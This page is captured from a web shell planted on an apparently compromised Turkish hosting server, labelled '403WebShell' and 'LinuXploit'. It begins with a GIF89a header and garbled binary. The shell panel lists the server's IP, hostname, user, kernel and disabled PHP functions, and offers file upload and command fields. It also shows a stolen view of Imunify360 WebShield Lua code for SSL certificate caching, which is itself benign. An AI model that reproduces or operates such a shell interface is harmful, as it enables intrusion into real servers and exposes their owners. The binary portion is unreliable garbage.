GIF89a=( ý' 7IAXKgNgYvYx\%wh&h}týh%ýs%xý}9ýRýý&ý0%ý (ý.ýý5ýSDýý&ýa)ýx5ýý;c*!&r)ï7õ<{4ý3ýH§KoTýýYýaqýýqýýFý !ý ' !ý NETSCAPE2.0 , =( ýýpH,ý$rýl:x(tJýZý,výýzýýxL.:ýýzýnýýý|Nýýýýý~ýýýýýýý& !ý0`9Rý}ýý"ý"a:Sý~xýýýýýýýýgýýýEýýýýýýýRýýýEýýýýBýý ýý8ýýDýýý"ýný ýHýýLýýDkDýBýýýýýDýýýTýýýH ýGýýA Rý |ýý m&ýýE8ýSýkGýAýpxýaýýý R2XBýýE8Iýýý6Xý:vT)ý~ýýqýåýý"F~%xý ý 4#Zý0O|-4BsýX:= Qý SalýýyXJ`G&|s hýýK3l7ýB|ý$'7J©*0!ýýDýn=ýPý ýýýý0`ýRýljýýýýv>ýýý5 ý.69ýødýýýýýnlvý9ýýf{ýýýPbx ýl5}ýpý ýýý ý3aýýýIýOýýýý!>ýýýiýý9ýý#ýý)pýa ½ ý{ý)vmýý%D~ 6fýýs}RýDýW Eý`!ý ý&L8xý ý{)x`X/>ý}mýýRý*|`Dý=ý_ ^ý5 !_&'aýOý7ýcýý`DCx`ý¥ý9ýYýFýýý`?ýý"ý ýn@`ý} lýý@4>ýd S ývýxNýý"@~dýý=ýgýs~Gýýý ýýýud &p8Qý)«lXDýýýýA~HýySunýjýýýk*DýLHý] ýýC"JýýXb~ªwSt}6K,ýýqýS:9*:ýýýlý@ý`ýý ý.ìýt9ýSý[©:ýý=`9Nýýýý{¿ýA !Rý:ýýý6ýýxý0ý_ ý;ýýýýýý^ýýý#ýýýý!ýýýýUýýý;0L1ýýýýýp% AýýU,uýý%ýSýý!ýýý~`ýGýýýý ýýý=4ýnpý3ýýýýýýýýýuýuýn|%2ýIýýrý#0ýýJ``8ý@S@5ý ýýý^`8Eý]ý.ýSýýý7 ý ý0ýj SýDý zýýýiýSýýýýý!ýýýlýýw9*ýDýIýnEXýýý &AýGoýQfýýFýý;ýýý}ýJýýýýF5ýýQ|ýýýXýýTýýyýýý]ý o ýýC=ýý:ýýýPB@ DýSý(>ýCýx}`ýýxJ,ýàýýp+eE0`ý}`A ý/NEýý ý9@ýýý Hý7ý!%B0`ýl*ýý!8 2ý%ý ý:ý1ý0Eýýux%nP1ý!ýC)ýP81lýxF#¬{ýýýýB0>ýý 403WebShell
403Webshell
Server IP : 217.18.85.50  /  Your IP : 18.191.171.72
Web Server : LiteSpeed
System : Linux server50.tr85.dhs.com.tr 3.10.0-962.3.2.lve1.5.85.el7.x86_64 #1 SMP Thu Apr 18 15:18:36 UTC 2024 x86_64
User : ferhatgenc ( )
PHP Version : 7.2.34
Disable Function : restore_ini,mail,openbasedir,f_open,system,dl,array_compare,array_user_key_compare,passthru,cat,exec,popen,proc_close,proc_get_status,proc_nice,proc_open,escapeshellcmd,escapeshellarg,show_source,posix_mkfifo,ini_restore,mysql_list_dbs,getmyuid,pconnect,link,symlink,fin,passthruexec,fileread,shell_exec,pcntl_exec,ini_alter,leak,apache_child_terminate,chown,posix_kill,posix_setpgid,posix_setsid,posix_setuid,proc_terminate,syslog,allow_url_fopen,fpassthru,execute,shell,chgrp,passthru,socket_select,socket_create,socket_create_listen,socket_create_pair,socket_listen,socket_accept,socket_bind,foreach,socket_strerror,pcntl_fork,pcntl_signal,pcntl_waitpid,pcntl_wexitstatus,pcntl_wifexited,pcntl_wifsignaled,pcntl_wifstopped,pcntl_wstopsig,pcntl_wtermsig,openlog,apache_get_version,apache_getenv,apache_note,apache_setenv,virtualal
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/imunify360-webshield/lualib/webshield/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /opt/imunify360-webshield/lualib/webshield/sslutils.lua
local ngx_ssl = require('ngx.ssl')
local openssl = require('openssl')
local lfs = require('lfs')

local domains_ips = ngx.shared.domains_ips

local ssl_cache_file = '/var/cache/imunify360-webshield/ssl.cache'

local notfound_ssl = ngx.shared.notfound_ssl_domains

local function split(line, sep, num)

    local fields = {}
    local pos = 0
    local count = 0
    local strlen = line:len()

    while strlen > pos do
        local start, stop = line:find(sep, pos)

        if start == nil then
            table.insert(fields, line:sub(pos))
            break
        end

        table.insert(fields, line:sub(pos, start - 1))

        pos = stop + 1
        count = count + 1

        if count == num then
            table.insert(fields, line:sub(pos))
            break
        end
    end

    return fields
end


local function read_certs(_cache)

    local f = io.open(ssl_cache_file)

    if not f then
        return
    end

    local _names = setmetatable({}, {_mode="kv"})
    for key, _ in pairs(_cache) do
        _names[key] = true
    end

    for line in f:lines() do

        local _pair = split(line, ';;', 1)

        if #_pair ~= 2 then
            goto continue
        end

        _pair[2] = _pair[2]:gsub('\\r\\n', '\\n')     -- unifying EOL markers
        local data = _pair[2]:gsub('\\n', '\n')       -- cert itself

        local bundle = table.concat({data}, "\n")

        local xcrt = openssl.x509.read(bundle)

        if not xcrt then
            ngx.log(ngx.WARN, "Failed to get SSL XCRT (host: ", _pair[1], ")")
            goto continue
        end

        local crt = ngx_ssl.parse_pem_cert(bundle)

        if not crt then
            ngx.log(ngx.WARN, "Failed to get SSL CRT (host: ", _pair[1], ")")
            goto continue
        end

        local key = ngx_ssl.parse_pem_priv_key(bundle)

        if not key then
            ngx.log(ngx.WARN, "Failed to get SSL KEY (host: ", _pair[1], ")")
            goto continue
        end

        local val = {["xcrt"] = xcrt, ["crt"] = crt, ["key"] = key}
        _cache[_pair[1]] = val
        _names[_pair[1]] = nil
        ::continue::
    end

    for key, _ in pairs(_names) do
        _cache[key] = nil
    end

    f:close()
end


local function cache_getter()

    local _cache = {}
    local _cached_mtime = 0

    return function (name, addr)

        local mtime = lfs.attributes(ssl_cache_file, 'modification')

        if _cached_mtime ~= mtime then

            _cached_mtime = mtime

            read_certs(_cache)
            notfound_ssl:flush_all()        -- clear not_found dict
        end

        local dedicated_domain = domains_ips:get(addr)

        if not name then    -- No SNI found

            ngx.log(ngx.WARN, "Could not get SNI for request (IP: ", addr, ")")

            if dedicated_domain then
                name = dedicated_domain
            end
        end

        if name then

            local cert = _cache[name]
            if cert then
                return cert
            end

            local notfound_name = notfound_ssl:get(name)    -- we didn't find cert for the name earlier
            if notfound_name then                           -- so there's no need to look for it again
                return
            end

            for key, cert in pairs(_cache) do
               if cert["xcrt"]:check_host(name) then
                  return cert
               end
            end

            ngx.log(ngx.WARN, "Certificate not found (host: ", name, ")")

            ok, err, forced = notfound_ssl:set(name, true, 3600) -- cache name for missing cert for an hour
            if not ok then
                ngx.log(ngx.ERR, "Could not cache name (", name, ") of missing cert: ", err)
            end
        end
    end
end


local get_cert_by_host = cache_getter()


return {
    get_cert_by_host = get_cert_by_host
}

Youez - 2016 - github.com/yon3zu
LinuXploit